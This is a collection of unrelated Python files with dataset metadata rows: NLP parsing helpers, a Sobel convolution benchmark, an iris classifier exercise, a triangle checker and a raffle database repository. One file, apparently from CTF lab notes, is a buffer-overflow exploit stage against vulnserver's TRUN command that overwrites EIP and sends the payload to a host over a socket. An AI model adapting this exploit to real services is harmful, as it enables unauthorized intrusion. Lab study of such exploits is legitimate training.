# entry = 0
# for token in polyglot_text.words:
# if pos_token == index_word:
# break
# if token == word:
# entry += 1
# pos_token += 1
# start = find_nth_overlapping(polyglot_text.row, word, entry + 1)
# end = start + len(word)
# return start, end
#
#
# def message_box(text='', head='', type_box=0):
# """Universal message box"""
# if sys.platform == "linux" or sys.platform == "linux2":
# # linux
# pass
# elif sys.platform == "darwin":
# # OS X
# pass
# elif sys.platform == "win32":
# # Windows...
# ctypes.windll.user32.MessageBoxA(None, text, head, type_box)
#
#
# class ParseStanfordTSV(object):
# """Converts and filters the stanford NER classification results"""
# def __init__(self, classification, set_tags, origin_text):
# self.classification = classification
# self.set_tags = set_tags
# self.origin_text = origin_text
#
# def __iter__(self):
# end_pos = 0
# for word_class in re.finditer('.+(?<!\r)(?=\r?\n)', self.classification):
# try:
# # word, tag = string.split(word_class.group(0), '\t')
# word, tag = str.split(word_class.group(0), '\t')
# start_pos = self.origin_text.find(word, end_pos)
# end_pos = start_pos + len(word)
# if tag in self.set_tags:
# yield {'match': {'start_match': start_pos,
# 'length_match': len(word),
# 'word': word},
# 'tag': tag}
# except:
# pass
#
#
# class ParsePolyglot(object):
# """Converts and filters the polyglot entities"""
# def __init__(self, classification, set_tags, origin_text, text_class):
# self.classification = classification
# self.set_tags = set_tags
# self.origin_text = origin_text
# self.text_class = text_class
#
# def __iter__(self):
# end_pos = 0 # Delete SIDE
# # end_pos = {'I-ORG': 0, 'I-PER': 0, 'I-LOC': 0} # Add SIDE
# for word_class in self.classification:
# try:
# if word_class.tag in self.set_tags:
# # end_pos = 0 # Add SIDE
# for i in range(word_class.start, word_class.end):
# utf8_units = self.text_class.words[i]
# try:
# utf8_units = utf8_units.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
#
# # DELETE SIDE
# if i == word_class.start:
# start_pos = self.origin_text.find(utf8_units, end_pos)
# end_pos = self.origin_text.find(utf8_units, end_pos) + len(utf8_units)
#
# yield {'match': {'start_match': start_pos,
# 'length_match': len(self.origin_text[start_pos: end_pos]),
# 'word': self.origin_text[start_pos: end_pos]},
# 'tag': word_class.tag}
#
# # ADD SIDE
# # if i == word_class.start:
# # start_pos = self.origin_text.find(utf8_units, end_pos[word_class.tag])
# # end_pos[word_class.tag] = self.origin_text.find(utf8_units, end_pos[word_class.tag]) + len(utf8_units)
# #
# # if self.origin_text[start_pos: end_pos[word_class.tag]] not in ['', '_', '→']: # Add SIDE
# # yield {'match': {'start_match': start_pos,
# # 'length_match': len(self.origin_text[start_pos: end_pos[word_class.tag]]),
# # 'word': self.origin_text[start_pos: end_pos[word_class.tag]]},
# # 'tag': word_class.tag}
# except:
# pass
#
#
# class ParsePolyglotPolarity(object):
# """Converts and filters the polyglot entities"""
# def __init__(self, classification, set_tags, origin_text, dict_tags):
# self.classification = classification
# self.set_tags = set_tags
# self.origin_text = origin_text
# self.dict_tags = dict_tags
#
# def __iter__(self):
# end_pos = 0
# for word in self.classification:
# try:
# tag = word.polarity
# # utf8_units = word if isinstance(word, unicode) else word.decode('utf8') # Delele SIDE(PY3)
# utf8_units = word
# try:
# utf8_units = utf8_units.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# start_pos = self.origin_text.find(utf8_units, end_pos)
# end_pos = start_pos + len(utf8_units)
# if tag:
# if self.dict_tags[tag] in self.set_tags:
# yield {'match': {'start_match': start_pos,
# 'length_match': len(utf8_units),
# 'word': utf8_units},
# 'tag': self.dict_tags[tag]}
# except:
# print(get_error())
#
#
# class EncodingPredictEntity(object):
# def __init__(self, matches, origin_text):
# self.matches = matches
# self.origin_text = origin_text
#
# def __iter__(self):
# end_pos = 0
# entity = self.matches['entity']
# matches = []
# doc = self.origin_text
# for match in self.matches['matches']:
# tag = '<{}>'.format(match['tag'])
# start = doc.find(match['match']['word'], end_pos)
# length = match['match']['length_match']
# doc = doc[:start] + tag + doc[start + length:]
# start_pos = doc.find(tag, end_pos)
# end_pos = start_pos + len(tag)
# matches.append({'match': {'start_match': start,
# 'length_match': end_pos - start_pos},
# 'tag': match['tag']})
# yield {'matches': matches,
# 'entity': entity,
# 'string': doc}
#
#
# class DecodingPredictEntity(object):
#
# def __init__(self, match, words):
# self.match = match
# self.words = words
# tags = [match['tag'] for match in match['matches']]
# self.tags = dict((tag, tags.count(tag)) for tag in tags)
#
# def __iter__(self):
# combination_words = []
# tags = self.tags.keys()
# for tag in tags:
# count = self.tags[tag]
# if count == 1:
# combination_words.append(self.words[tag])
# else:
# combination_words.append(list(permutations(self.words[tag], self.tags[tag])))
# combination = list(product(*combination_words))
# samples = []
# for comb in combination:
# sample = self.replace(self.match['string'], tags, comb)
# samples.append(sample)
# samples.append({'string': self.match['string'],
# 'matches': self.match['matches'],
# 'entity': self.match['entity']})
# yield samples
#
# def replace(self, doc, tags, combination):
# document = doc
# words = {}
# for tag in tags:
# words[tag] = combination[tags.index(tag)].__iter__()
# end_pos = 0
# matches = []
# for match in self.match['matches']:
# word = words[match['tag']].next()
# tag = '<{}>'.format(match['tag'])
# start = document.find(tag, end_pos)
# length = match['match']['length_match']
# document = document[:start] + word + document[start + length:]
# start_pos = document.find(word, end_pos)
# end_pos = start_pos + len(word)
# matches.append({'match': {'start_match': start,
# 'length_match': end_pos - start_pos,
# 'word': word},
# 'tag': match['tag']})
# return {'string': document,
# 'matches': matches,
# 'entity': self.match['entity']}
#
#
# class ParseMatchesMorphemes(object):
# """Converts and filters the polyglot entities"""
# def __init__(self, matches, text, lang=None):
# self.matches = matches
# if isinstance(text, Text):
# self.text_class = text
# self.origin_text = text.raw
# else:
# self.origin_text = text
# self.text_class = Text(text, hint_language_code=lang)
#
# def __iter__(self):
# end_pos = 0
# ini_pos = 0
# left_pos = 0
# right_pos = 0
# n_word = -1
# n_word_start = 0
# # morphemes = [ morph.string.strip() for morph in self.text_class.morphemes]
# morphemes = []
# [morphemes.extend(morph.morphemes) for morph in self.text_class.tokens]
# for match in self.matches:
# if right_pos > match[0]:
# n_word = n_word_start - 1
# end_pos = left_pos
# while match[0] > end_pos:
# n_word += 1
# ini_pos = self.origin_text.find(morphemes[n_word], end_pos)
# end_pos = ini_pos + len(morphemes[n_word])
# n_word_start = n_word
# left_pos = ini_pos
# while end_pos < match[1]:
# right_pos = end_pos
# n_word += 1
# ini_pos = self.origin_text.find(morphemes[n_word], end_pos)
# end_pos = ini_pos + len(morphemes[n_word])
# if end_pos > match[1]:
# end_pos -= len(morphemes[n_word])
# n_word -= 1
# if ini_pos <= match[1]:
# right_pos = end_pos
# yield [self.origin_text[left_pos: right_pos], left_pos, right_pos]
#
#
# class ParseMatchesWords(object):
# """Converts and filters the polyglot entities"""
# def __init__(self, matches, text, lang=None):
# self.matches = matches
# if isinstance(text, Text):
# self.text_class = text
# self.origin_text = text.row
# else:
# self.origin_text = text
# self.text_class = Text(text, hint_language_code=lang)
#
# def __iter__(self):
# end_pos = 0
# ini_pos = 0
# left_pos = 0
# right_pos = 0
# n_word = -1
# n_word_start = 0
# for match in self.matches:
# if right_pos > match[0]:
# n_word = n_word_start - 1
# end_pos = left_pos
# while match[0] > end_pos:
# n_word += 1
# ini_pos = self.origin_text.find(self.text_class.words[n_word], end_pos)
# end_pos = ini_pos + len(self.text_class.words[n_word])
# n_word_start = n_word
# left_pos = ini_pos
# while end_pos < (match[1]):
# right_pos = end_pos
# n_word += 1
# ini_pos = self.origin_text.find(self.text_class.words[n_word], end_pos)
# end_pos = ini_pos + len(self.text_class.words[n_word])
# if ini_pos <= (match[1]):
# right_pos = end_pos
#
# yield [self.origin_text[left_pos: right_pos], left_pos, right_pos]
#
#
# class ParseMatchesUnits(object):
# """"""
# def __init__(self, matches, text, units, units_tag=None):
# self.matches = matches
# try:
# text = text.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# self.origin_text = text
# self.units = units
# self.units_tag = units_tag
#
# def __iter__(self):
#
# for match in self.matches:
# end_pos = -1
# ini_pos = 0
# left_pos = -1
# right_pos = -1
# n_word = -1
# n_word_start = 0
# tag_match = []
# if right_pos > match[0]:
# n_word = n_word_start
# end_pos = left_pos
# while match[0] > end_pos:
# n_word += 1
# utf8_units = self.units[n_word]
# try:
# utf8_units = utf8_units.decode('utf8')
# except:
# pass
# end_pos = max(end_pos, 0)
# ini_pos = self.origin_text.find(utf8_units, end_pos)
# end_pos = ini_pos + len(utf8_units)
#
# n_word_start = max(n_word, 0)
# left_pos = ini_pos
# # end_pos = ini_pos
#
# while end_pos < match[1]:
# right_pos = end_pos
# if self.units_tag and n_word > -1:
# tag_match.append(self.units_tag[n_word][1])
# n_word += 1
# utf8_units = self.units[n_word]
# try:
# utf8_units = utf8_units.decode('utf8')
# except:
# pass
# ini_pos = self.origin_text.find(utf8_units, end_pos)
# end_pos = ini_pos + len(utf8_units)
# if ini_pos <= match[1]:
# right_pos = end_pos
# if self.units_tag:
# tag_match.append(self.units_tag[n_word][1])
# n_word += 1
# n_word -= 1
#
# if self.origin_text[left_pos: right_pos]==u'':
# pass
# yd = [self.origin_text[left_pos: right_pos], left_pos, right_pos, n_word_start, n_word, tag_match]
# yield yd
#
#
# class ParseMatchesUnitsBack(object):
# """"""
# def __init__(self, matches, text, units, units_tag=None):
# self.matches = matches
# try:
# text = text.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# self.origin_text = text
# self.units = units
# self.units_tag = units_tag
#
# def __iter__(self):
# end_pos = 0
# ini_pos = 0
# left_pos = 0
# right_pos = 0
# n_word = -1
# n_word_start = 0
# for match in self.matches:
# tag_match = []
# if n_word > match[0]:
# n_word = n_word_start - 1
# end_pos = left_pos
# while match[0] > n_word:
# n_word += 1
# utf8_units = self.units[n_word]
# try:
# utf8_units = utf8_units.decode('utf8')
# except:
# pass
# ini_pos = self.origin_text.find(utf8_units, end_pos)
# end_pos = ini_pos + len(utf8_units)
# n_word_start = n_word
# left_pos = ini_pos
# while n_word <= match[1]:
# right_pos = end_pos
# if self.units_tag:
# tag_match.append(self.units_tag[n_word][1])
# n_word += 1
# if n_word >= len(self.units):
# break
# utf8_units = self.units[n_word]
# try:
# utf8_units = utf8_units.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# ini_pos = self.origin_text.find(utf8_units, end_pos)
# end_pos = ini_pos + len(utf8_units)
#
# yield [self.origin_text[left_pos: right_pos], left_pos, right_pos, n_word_start, n_word-1, tag_match]
#
#
# def check_skip_string_old(text, origin_text):
# try:
# text = text.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# try:
# origin_text = origin_text.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# j = 0
# dif_map = [0]*len(origin_text)
# for i in range(len(text)):
# while text[i] != origin_text[j]:
# dif_map[j] = 1
# j += 1
# j += 1
# return dif_map
#
#
# def check_skip_string(text, origin_text):
# try:
# text = text.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# try:
# origin_text = origin_text.decode('utf8')
# except UnicodeError:
# pass
# except AttributeError:
# pass
# dif_map = [1]*len(origin_text)
# diff = difflib.SequenceMatcher(None, text, origin_text)
# last_match = {'a': -1, 'b': -1}
# matches = diff.get_matching_blocks()
# for match in diff.get_matching_blocks():
# if match.size == 0:
# break
# f = last_match['b'] + 1
# ff = match.a - last_match['a'] - 1
# key = range(last_match['b'] + 1, last_match['b'] + 1 + match.a - last_match['a'] - 1)
# dif_map[last_match['b'] + 1: last_match['b'] + match.a - last_match['a']] = [0 for i in key]
# key = range(match.b, match.b + match.size)
# dif_map[match.b: match.b + match.size] = [0 for i in key]
# last_match = {'a': match.a + match.size - 1, 'b': match.b + match.size - 1}
# return dif_map
#
#
# def check_intersection_range(range1, range2):
# """"""
# result = False
# if range1[0] >= range2[0] and range1[0] <= range2[1]:
# result = True
# elif range1[1] >= range2[0] and range1[1] <= range2[1]:
# result = True
# elif range2[0] >= range1[0] and range2[0] <= range1[1]:
# result = True
# elif range2[1] >= range1[0] and range2[1] <= range1[1]:
# result = True
# return result
#
#
# def list_decode(data, codec='utf-8'):
# """"""
# return [x.decode(codec) for x in data]
def get_error():
    """Return details of the exception currently being handled.

    Keys: 'TypeError' (exception class), 'MessageError' (message text),
    'TracebackError' (formatted traceback).
    """
    exc_type, exc_value, _tb = sys.exc_info()
    return {
        'TypeError': str(exc_type),
        'MessageError': str(exc_value),
        'TracebackError': "".join(traceback.format_exc()),
    }
# def send_post(url, data, cls=None):
# try:
# req = requests.post(url, json=data)
# print("Status: {0}. Url: {2}. Response: {1} ").format(req.status_code, req.text, url)
# except requests.RequestException:
# print("Status: {0}. Url: {2}. Response: {1} ").format(404, None, url)
# except Exception:
# error = get_error()
# print(error)
#
#
# def send_many_post(urls, data, cls=None):
# if not isinstance(urls, list):
# urls = [urls]
# for url in urls:
# send_post(url, data)
# def create_tmp_file():
# from nlp.config import TEMP_FILES_DIRECTORY
# path = get_abs_path(TEMP_FILES_DIRECTORY)
# if not os.path.isdir(path):
# os.mkdir(path)
# import uuid
# name = os.path.join(path, str(uuid.uuid4()))
# f = open(name, 'w')
# return f
#
#
# def open_tmp_file(fname):
# from nlp.config import TEMP_FILES_DIRECTORY
# path = get_abs_path(TEMP_FILES_DIRECTORY)
# name = os.path.join(path, fname)
# f = open(name, 'r+b')
# return f
#
#
# def remove_tmp_file(fname):
# from nlp.config import TEMP_FILES_DIRECTORY
# path = get_abs_path(TEMP_FILES_DIRECTORY)
# os.remove(os.path.join(path, fname))
#
#
# def convert_part1_to_part3(lang):
# try:
# l = iso639.languages.get(part3=lang)
# except KeyError:
# try:
# l = iso639.languages.get(part1=lang)
# except KeyError:
# if lang == 'qcn':
# return 'qcn'
# else:
# return
# return l.part3
#
#
# def convert_part3_to_part1(lang):
# try:
# l = iso639.languages.get(part3=lang)
# except KeyError:
# try:
# l = iso639.languages.get(part1=lang)
# except KeyError:
# return
# language = l.part1
# if language:
# return language
# else:
# return l.part3
#
#
# def convert_name_to_part3(name):
# if name == 'Slovene':
# name = 'Slovenian'
# try:
# l = iso639.languages.get(name=name)
# except KeyError:
# return
# return l.part3
#
# def convert_name_to_part1(name):
# if name == 'Slovene':
# name = 'Slovenian'
# try:
# l = iso639.languages.get(name=name)
# except KeyError:
# return
# return l.part1
re_special = ['?', '(', ')', '<', '>', '[', ']', '$', '^', '.', '|', '*', '+', '{', '}']


def escape(pattern):
    """Backslash-escape regex metacharacters in *pattern* (cf. re.escape).

    NUL characters become the octal escape sequence backslash-000.
    Bug fix: the original emitted " \\x" with a stray leading space
    (via the deprecated "\\{}" string escape), which corrupted the
    resulting regular expression.
    """
    out = list(pattern)
    for i, ch in enumerate(pattern):
        if ch == "\000":
            out[i] = "\\000"
        if ch in re_special:
            out[i] = "\\" + ch
    return pattern[:0].join(out)
# Character classes used by the trimming/cleaning helpers below.
# Punctuation characters (ASCII punctuation plus dashes, quotes, currency
# signs and the CJK full stop).
punctuation = set(u' ,,.:;\'\"<>\\/|{}[]`$!&@#%^?*()-_+=-~⟨⟩–—-―‐«»‘’“”·•©¤៛№₳฿₵¢₡₢₠$₫৳₯€ƒ₣₲₴₭ℳ₥₦₧₱₰£₨₪₮₩¥៛®″§™¦。')
# Word-delimiter characters (overlaps heavily with `punctuation`).
delimiters = set(u' ,.:;\'\"<>\\/|{}[]`!@#?*()_+=-–—-―‐~⟨⟩«»‘’“”·•©¤®″™¦®″。')
# Characters intended to be stripped outright.
remove = set(u'«»·•©¤®§™¦៛№®()')
# Whitespace / control characters.
spec = set('\n\t\r\a\b\f\v\0')
# Local alias: the helpers below call isdigit(ch) instead of ch.isdigit().
isdigit = str.isdigit
def extract_numbers(text):
    """Collect the digit characters and the separators ',./-' from *text*."""
    kept = [c for c in text if isdigit(c) or c in ',./-']
    return ''.join(kept)
def remove_digits(string):
    """Return *string* with all digit characters stripped out."""
    return ''.join(c for c in string if not isdigit(c))
def remove_digits_and_delimiters(string):
    """Return *string* without digits and without `delimiters` characters."""
    kept = [c for c in string if not isdigit(c) and c not in delimiters]
    return ''.join(kept)
def trim_punkt(word):
    """Strip punctuation characters from both ends of *word*.

    Words that are falsy or contain the '<num>' placeholder come back
    unchanged; a word that is a single punctuation char collapses to ''.
    """
    if not word or '<num>' in word:
        return word
    lo, hi = 0, len(word)
    while hi - lo > 1 and word[lo] in punctuation:
        lo += 1
    while hi - lo > 1 and word[hi - 1] in punctuation:
        hi -= 1
    trimmed = word[lo:hi]
    if len(trimmed) == 1 and trimmed in punctuation:
        return ''
    return trimmed
def get_dir_path(path):
    """Resolve *path* to an absolute path.

    Absolute paths are returned unchanged. Relative paths are resolved
    against the directory three levels above this module's file —
    presumably the project root; TODO confirm against the repo layout.
    """
    if os.path.isabs(path):
        return path
    base = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
    return os.path.abspath(os.path.join(base, path))
| true |
46f53d5179cd02a324bcf491d71d609d3364205b | Python | CharanyaSudharsanan/Convolution-using-Sobel-Filters | /PA1_100x100filter.py | UTF-8 | 3,816 | 3.015625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Sat Jun 16 10:57:47 2018
@author: dues1
"""
import numpy as np
import cv2
import time
#Random matrices for 1D Convolution
# Separable 1-D kernels: column vectors (101x1) and row vectors (1x101)
# filled with random values (stand-ins for real Sobel coefficients).
sobelx1 = np.random.rand(101,1)
sobelx2 = np.random.rand(1,101)
sobely1 = np.random.rand(101,1)
sobely2 = np.random.rand(1,101)
#Random matrices for 2D Convolution
arrayx = np.outer(sobelx1,sobelx2) #2D Sobel X filter
arrayy = np.outer(sobely1,sobely2) #2D Sobel Y filter
# NOTE(review): arrayx/arrayy are never used below — the 2-D loop rebuilds
# np.outer(sobelx2, sobelx1) (the transpose) itself; confirm which is intended.
#import image and convert it into an array
img = cv2.imread('lena_gray.jpg',0)
#print(img.shape)
#display input grayscale image
cv2.namedWindow('Input Image', cv2.WINDOW_NORMAL)
cv2.imshow('Input Image',img)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Output buffers with the image's shape and dtype.
sobelx_output_1D = np.zeros_like(img) #Gx
sobely_output_1D = np.zeros_like(img) #Gy
sobelxy_output_1D = np.zeros_like(img) #G
sobelx_output_2D = np.zeros_like(img) #Gx
sobely_output_2D = np.zeros_like(img) #Gy
sobelxy_output_2D = np.zeros_like(img) #G
#reference : https://docs.scipy.org/doc/numpy-1.14.0/reference/generated/numpy.pad.html
def pad_with(vector, pad_width, iaxis, kwargs):
    """np.pad callback: zero-fill the padded border of each 1-D slice.

    :param vector: 1-D slice (already extended by np.pad) to modify in place
    :param pad_width: (before, after) pad counts for this axis
    :param iaxis: axis index (unused)
    :param kwargs: extra keyword arguments from np.pad (unused)
    """
    vector[:pad_width[0]] = 0
    # Bug fix: vector[-0:] is the WHOLE vector, so a zero-width trailing pad
    # must be skipped instead of zeroing every element.
    if pad_width[1] > 0:
        vector[-pad_width[1]:] = 0
    return vector
# Zero-pad 50 pixels on every edge so the 101x101 window stays in bounds.
img = np.pad(img, 50 , pad_with)
#print(img.shape)
#print(img)
row = img.shape[0]
col = img.shape[1]
# ---- 2D convolution: one full 101x101 kernel product per output pixel ----
st = time.perf_counter()  # time.clock() was removed in Python 3.8
# Hoist the loop-invariant kernels: the original rebuilt the outer product
# on every pixel. NOTE(review): np.outer(sobelx2, sobelx1) is the transpose
# of arrayx built above — kept as-is to preserve the original output.
kernel_x_2d = np.outer(sobelx2, sobelx1)
kernel_y_2d = np.outer(sobely2, sobely1)
for x in range(51, row-51):
    for y in range(51, col-51):
        window = img[x-51:x-51+101, y-51:y-51+101]
        sobx = (kernel_x_2d * window).sum()
        sobelx_output_2D[x-51, y-51] = sobx
        soby = (kernel_y_2d * window).sum()
        sobely_output_2D[x-51, y-51] = soby
        # Gradient magnitude G = sqrt(Gx^2 + Gy^2)
        sobelxy_output_2D[x-51, y-51] = np.sqrt(sobx * sobx + soby * soby)
end = time.perf_counter()
tt = end - st
print('Time taken for 2D Convolution :', tt)
# Display the three 2-D results (blocks until a key is pressed).
cv2.imshow('sobelx_2D image',sobelx_output_2D)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.imshow('sobely_2D image',sobely_output_2D)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.imshow('sobelxy_2D image', sobelxy_output_2D)
cv2.waitKey(0)
cv2.destroyAllWindows()
# ---- 1D (separable) convolution: column pass, re-pad, then row pass ----
st1 = time.perf_counter()  # time.clock() was removed in Python 3.8
interx = np.zeros((512,512))
intery = np.zeros((512,512))
# Hoist the loop-invariant 1-D kernel slices out of the loops.
col_kernel_x = sobelx1[0:101, 0]
col_kernel_y = sobely1[0:101, 0]
row_kernel_x = sobelx2[0, 0:101]
row_kernel_y = sobely2[0, 0:101]
# Vertical pass (the image was padded by 50 on every edge).
for x in range(51, row-51):
    for y in range(51, col-51):
        interx[x-51, y-51] = np.sum(np.multiply(col_kernel_x, img[x-51:x-51+101, y]))
        intery[x-51, y-51] = np.sum(np.multiply(col_kernel_y, img[x-51:x-51+101, y]))
# Re-pad the intermediates so the horizontal pass also stays in bounds.
interx = np.pad(interx, 50 , pad_with)
intery = np.pad(intery, 50 , pad_with)
# Horizontal pass over the intermediate results.
for x in range(51, interx.shape[0]-51):
    for y in range(51, interx.shape[1]-51):
        sobx = np.sum(np.multiply(row_kernel_x, interx[x, y-51:y-51+101]))
        sobelx_output_1D[x-51, y-51] = sobx
        soby = np.sum(np.multiply(row_kernel_y, intery[x, y-51:y-51+101]))
        sobely_output_1D[x-51, y-51] = soby
        # Gradient magnitude G = sqrt(Gx^2 + Gy^2)
        sobelxy_output_1D[x-51, y-51] = np.sqrt(sobx * sobx + soby * soby)
end1 = time.perf_counter()
tt1 = end1 - st1
print('Time taken for 1D Convolution :', tt1)
# Display the three 1-D results (blocks until a key is pressed).
cv2.imshow('sobelx image',sobelx_output_1D)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.imshow('sobely image',sobely_output_1D)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.imshow('sobelxy image',sobelxy_output_1D)
cv2.waitKey(0)
cv2.destroyAllWindows()
| true |
4620158a0f98916fb6882eedbc7014fe654f9a64 | Python | gallowag/galloway-cs450 | /prove01.py | UTF-8 | 2,834 | 3.796875 | 4 | [] | no_license | from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import GaussianNB
#step 1
def load_data():
    """Load and return the scikit-learn iris dataset bunch."""
    return datasets.load_iris()
#step 2
def prepare_training_and_test_sets(iris=None):
    """Split the iris data into a 70% train / 30% test partition.

    :param iris: dataset bunch with .data and .target. Defaults to None,
        in which case the dataset is loaded here — the original read a
        module-level global ``iris`` that was never defined (NameError at
        runtime). The default keeps the existing zero-argument call sites
        working.
    :return: (data_train, data_test, targets_train, targets_test)
    """
    if iris is None:
        iris = load_data()
    return train_test_split(iris.data, iris.target, test_size=0.30)
#step 3
def use_existing_algorithm_to_create_a_model(data_train, targets_train):
    """Fit a Gaussian naive Bayes classifier and return the fitted model."""
    return GaussianNB().fit(data_train, targets_train)
#calculate accuracy
def calculate_accuracy(list1, list2):
    """Print how many paired elements of list1/list2 match, as count and percent.

    :param list1: predicted values
    :param list2: reference values (compared pairwise via zip)
    Bug fix: the original divided by len(list1) unconditionally, raising
    ZeroDivisionError for empty input; an empty list now reports 0.0%.
    """
    length = len(list1)
    count = sum(1 for i, j in zip(list1, list2) if i == j)
    percent_accuracy = (count / length) * 100 if length else 0.0
    print("Achieved " + str(count) + "\\" + str(length) + " or " + str(percent_accuracy) + "% accuracy")
#step 4
def use_that_model_to_make_predictions(model, data_test, targets_test):
    """Predict on the test data, report accuracy, and return the predictions."""
    predictions = model.predict(data_test)
    print("Naive Bayes algorithm: ")
    calculate_accuracy(predictions, targets_test)
    return predictions
# HardCodedModel: trivial baseline that predicts class 0 for every sample.
class HardCodedModel:
    """Baseline "model" whose predict() always answers class 0."""

    def __init__(self):
        pass

    def predict(self, data_test):
        """Return a list of zeros, one entry per test sample."""
        return [0 for _ in data_test]
# HardCodedClassifier: "classifier" whose fit() ignores the training data.
class HardCodedClassifier:
    """Classifier stub: fit() discards the data and returns a HardCodedModel."""

    def __init__(self):
        pass

    def fit(self, data_train, targets_train):
        """Ignore the training data and hand back a fresh HardCodedModel."""
        return HardCodedModel()
#step 5
def implement_your_own_new_algorithm(data_train, data_test, targets_train, targets_test):
    """Train/evaluate the hard-coded baseline and return its predictions."""
    model = HardCodedClassifier().fit(data_train, targets_train)
    predictions = model.predict(data_test)
    print("Hard-coded algorithm: ")
    calculate_accuracy(predictions, targets_test)
    return predictions
#main
def main():
    """Run the experiment: load data, split, then score both classifiers."""
    # Bug fix: the original did `iris = load_data` (no call), binding the
    # function object instead of the dataset; it also left the module-level
    # `iris` that prepare_training_and_test_sets reads undefined. Assigning
    # the global here makes the existing zero-argument call below work.
    global iris
    iris = load_data()
    data_train, data_test, targets_train, targets_test = prepare_training_and_test_sets()
    # Call steps 3-5
    model = use_existing_algorithm_to_create_a_model(data_train, targets_train)
    targets_predicted = use_that_model_to_make_predictions(model, data_test, targets_test)
    my_targets_predicted = implement_your_own_new_algorithm(data_train, data_test, targets_train, targets_test)
my_targets_predicted = implement_your_own_new_algorithm(data_train, data_test, targets_train, targets_test)
#call main
if __name__ == "__main__":
main()
| true |
a29a43b89e5b498f7011a4507401ea06f7ab0c42 | Python | thebluetoob/ctf-notes-public | /bufferoverflow/vulnserver-trun/5-esp-confirm.py | UTF-8 | 475 | 2.59375 | 3 | [] | no_license | #!/usr/bin/python
import socket
#[*] Exact match at offset 2006
buffer = "A" * 2006
# eip = "B" * 4
# 625011AF
eip = "\xAF\x11\x50\x62"
remaining = "DEFGHIJKLMNOPQRS" + "C" * (3000 - len(buffer) - len(eip) - 16)
payload = buffer + eip + remaining
print("Throwing evil payload of size %s at TRUN option" % len(payload))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.11.20.27",9999))
s.recv(1024)
s.send("TRUN ." + payload)
s.recv(1024)
s.close() | true |
51575c9f1f69bd316c21438907b6ca419fefc2a7 | Python | Joshawikkit13/Python-Project | /Week 5/Project2-Crow.py | UTF-8 | 457 | 4.15625 | 4 | [] | no_license | side1 = float(input("Please enter side 1 (not the hypotenuse) of the triangle."))
side2 = float(input("Please enter side 2 (also not the hypotenuse) of the triangle."))
side3 = float(input("Please enter the hypotenuse of the triangle."))
import math
# Bug fix: the sides come from float(input(...)), so exact equality of the
# squares is unreliable; compare with a relative tolerance instead.
if math.isclose((side1 * side1) + (side2 * side2), (side3 * side3)):
    print("Congratulations, you have a right triangle!")
else:
    print("Sorry, this is not a right triangle.")
input("Press any key, then press enter to exit.") | true |
df843c59393ba2634a0ee6ccf5fd4c87407f1707 | Python | Nate314/CS470GroupProject | /service/endpoints/RaffleRepository.py | UTF-8 | 11,926 | 2.625 | 3 | [] | no_license | import datetime
import random
from helpers import Database
from helpers import StatusCodes
from .CommonRepository import CommonRepository
# Repositories retrieve data from the database
# Repositories retrieve data from the database
class RaffleRepository:
    """Data-access layer for raffle create/join/list/history/end operations.

    Every method returns a (body, status-code) pair. All WHERE clauses use
    %s placeholders with parameter lists (the style already used by
    get_historic_raffles/end_raffle) instead of f-string interpolation,
    which exposed the queries to SQL injection.
    """

    # initialize RaffleRepository
    def __init__(self):
        self.db = Database()
        self._commonRepository = CommonRepository()

    # returns JSON representing all of the users participating in this raffle
    def __get_discordusers_in_raffle(self, raffleID):
        """Return a list of user dicts (id, name, currency, hash, picture)."""
        # SECURITY NOTE(review): eval(str(...)) executes the textual repr of
        # the query result to materialize it as Python objects. It works only
        # because rows repr as literals; replace with a real to-dict API on
        # Database when possible.
        return eval(str(self.db.select([
            'discordusers.DiscordUserID', 'discordusers.UserName', 'discordusers.Currency',
            'discordusers.UserHash', 'resources.Link AS ProfilePicture'],
            '''discorduserraffles
            LEFT OUTER JOIN discordusers ON discordusers.DiscordUserID = discorduserraffles.DiscordUserID
            LEFT OUTER JOIN resources ON resources.ResourceID = discordusers.ResourceID''',
            'discorduserraffles.RaffleID = %s', [raffleID])))

    # starts a new raffle
    def start_raffle(self, rName, rDiscordUserID, rServerID, rDuration, rSeedAmount):
        """Create a raffle seeded with rSeedAmount taken from the creator.

        :return: ('', OK) on success; (msg, CONFLICT) if the name exists on
            the server; ('Insufficient funds', IM_A_TEAPOT) when the creator
            cannot cover the seed; ('', INTERNAL_SERVER_ERROR) on failure.
        """
        try:
            userCurrenyQuery = self.db.select(['Currency'], 'discordusers',
                'DiscordUserID = %s', [rDiscordUserID]).getRows()
            if len(userCurrenyQuery) > 0:
                userCurrency = userCurrenyQuery[0]['Currency']
                # make sure the user has enough currency to start this raffle
                if userCurrency >= rSeedAmount:
                    endTime = None
                    # a negative duration leaves EndTime NULL (no scheduled end)
                    if rDuration >= 0:
                        nowtime = datetime.datetime.now().timestamp()
                        endTime = str(datetime.datetime.fromtimestamp(int(nowtime + (rDuration / 1000))))
                    # create raffle in Raffles table; insertOne is falsy on conflict
                    if self.db.insertOne('raffles', ['ServerID', 'Name', 'EndTime', 'Currency', 'DiscordUserID'], {
                        'ServerID': rServerID,
                        'Name': rName,
                        'EndTime': endTime,
                        'Currency': rSeedAmount,
                        'DiscordUserID': rDiscordUserID
                    }):
                        # get the new RaffleID
                        maxID = self.db.select(['MAX(RaffleID) AS NewID'], 'raffles').getRows()
                        newRaffleID = 1
                        if (len(maxID) > 0):
                            newRaffleID = maxID[0]['NewID']
                        # register the creator as the first participant
                        self.db.insertOne('discorduserraffles', ['DiscordUserID', 'RaffleID', 'JoinDate'], {
                            'DiscordUserID': rDiscordUserID,
                            'RaffleID': newRaffleID,
                            'JoinDate': str(datetime.datetime.now())
                        })
